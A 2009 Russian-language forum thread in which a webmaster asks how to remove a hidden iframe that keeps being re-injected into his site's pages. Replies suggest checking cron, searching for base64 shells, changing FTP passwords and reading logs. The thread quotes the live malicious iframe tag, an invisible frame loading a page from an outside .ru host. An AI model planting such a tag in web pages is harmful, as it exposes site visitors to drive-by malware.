как удалить iframe?

Discussion in 'Безопасность и Анонимность' started by Gidz, 2 Sep 2009.

  1. Gidz

    Gidz New Member

    Joined:
    10 Aug 2009
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    Млин, совсем меня извел, не могу не как удалить на сервере iframe, grep-ом ищу в файлах .php .shtml .html по названию iframe, чищу все что находит, но через какое-то время они опять заражаются, вот такой куйней
    Code:
    <iframe src="http://x3y.ru:8080/index.php" width=116 height=134 style="visibility: hidden"></iframe>
    чье это? :D

    вообщем прошу помощи, уже несколько раз менял пароли на фтп и на рута, проверял свой локальный комп разными сканерами, curelt/AVZ/KasperskyVRT, поменял фтп клиента, но не помогло :(
     
    #1 Gidz, 2 Sep 2009
    Last edited: 2 Sep 2009
  2. ReanimatoR

    ReanimatoR Elder - Старейшина

    Joined:
    27 Aug 2006
    Messages:
    115
    Likes Received:
    118
    Reputations:
    34
    проверь cron:))
     
  3. Karantin

    Karantin Elder - Старейшина

    Joined:
    21 Dec 2007
    Messages:
    330
    Likes Received:
    146
    Reputations:
    24
    Может у тебя хостера похакали?
     
  4. POS_troi

    POS_troi Elder - Старейшина

    Joined:
    1 Dec 2006
    Messages:
    1,569
    Likes Received:
    466
    Reputations:
    108
    поиши еще по base64 (шелл может) + пасс от ФТП смени (за дурака не держу, просто не писал ты о этом действии).
     
  5. lo0

    lo0 Elder - Старейшина

    Joined:
    6 Mar 2006
    Messages:
    113
    Likes Received:
    20
    Reputations:
    14
    Смени владельца файла и поставь права тока на чтение.
    Но лучше курить логи и дырку латать ;)
     
  6. Ex@rcist

    Ex@rcist New Member

    Joined:
    4 Sep 2009
    Messages:
    22
    Likes Received:
    3
    Reputations:
    0
    Сам недавно столкнулся с этой заразой. Пришлось чистить сотни страниц на нескольких серверах.
    Помог этот простенький скрипт (может кому пригодится чтобы не чистить руками):

    Code:
    find . -type f -name '*.php' | xargs perl -p -i -e 's/.*malware_domain.*$//g'
    Б большинстве случаев причина заражения - на стороне клиента. Трой ворует пароли ftp - после делает конет на сервак, ищет файлы заглавных страниц index.php index.html main.html page.html и делает инъекцию кода.

    Поэтому первое лекарство - свежий бесплатный антивирус с новыми базами http://www.freedrweb.com/cureit/ Ну и конечно же поиск багов на сайте.
     
  7. pithagora

    pithagora New Member

    Joined:
    24 Aug 2007
    Messages:
    14
    Likes Received:
    3
    Reputations:
    0
    у вас троян пишет в скриптах iframe. создает себе место где пихает ссылки на ресурсы. он гадит скрипты и если это онлайн сайт, Гугл сканирует код и находит и считает как вредоносное ПО для компа. У меня было несколько таких случий на наших серверах. Рекомендую менять все пароли на сложные, очистить все скрипты, и поработать над дырами скриптов и улучшить безопасность. Потом, если это сайт, надо сообщить Гуглу что вы предприняли все меры чтоб скрипты работали нормально и чтоб они переиндексировали сайт.